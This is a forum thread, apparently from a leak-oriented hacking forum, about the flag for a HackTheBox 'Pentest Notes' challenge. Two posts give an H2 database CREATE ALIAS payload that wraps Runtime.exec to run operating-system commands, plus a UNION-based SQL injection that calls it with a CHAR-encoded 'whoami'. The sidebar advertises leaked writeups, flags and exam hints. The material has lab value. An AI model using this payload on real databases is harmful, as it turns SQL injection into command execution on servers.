Oct 27, 2024, 07:17 AM
|
Pentest Notes Hackthebox Challenge flag
by trevor69000 - Sunday October 27, 2024 at 07:17 AM
|
|
Oct 27, 2024, 03:19 PM
Will be interesting
Oct 27, 2024, 07:50 PM
you should better explain how to bypass filter for $$ and CONCAT instead of just flag
Oct 27, 2024, 08:12 PM
(Oct 27, 2024, 07:50 PM)Steward Wrote: you should better explain how to bypass filter for $$ and CONCAT instead of just flag create aliases without a `$` CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").next() : ""; }';
Oct 28, 2024, 10:06 AM
Will be interesting
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Replying With Hidden Content
Oct 30, 2024, 07:39 PM
Oct 31, 2024, 09:44 AM
Thanks for sharing!!!!!!!!
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Nov 03, 2024, 09:18 AM
how can i turn the SQLi into a way to get the flag
Nov 05, 2024, 04:39 PM
Using the alias created to read files in OS
(Oct 27, 2024, 08:12 PM)mazafaka555 Wrote:(Oct 27, 2024, 07:50 PM)Steward Wrote: you should better explain how to bypass filter for $$ and CONCAT instead of just flag How can I then use the alias? I'm trying something like: SQL Injection' OR 1=0 UNION SELECT EXECVE(CHAR(119) + CHAR(104) + CHAR(111) + CHAR(97) + CHAR(109) + CHAR(105)) -- - |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 376 | 93,736 |
1 hour ago Last Post: Sukon |
||
| [FREE] CPTS • CWES • CDSA • CWEE Exam Hint | 233 | 32,335 |
1 hour ago Last Post: Sukon |
||
| [FREE] CPTS 12 FLAGS | 74 | 2,364 |
1 hour ago Last Post: Sukon |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 89 | 8,101 |
6 hours ago Last Post: Xploitd |
||
|
|
[FREE] HackTheBox All Cheatsheets | 10 | 629 |
10 hours ago Last Post: chufoni |
|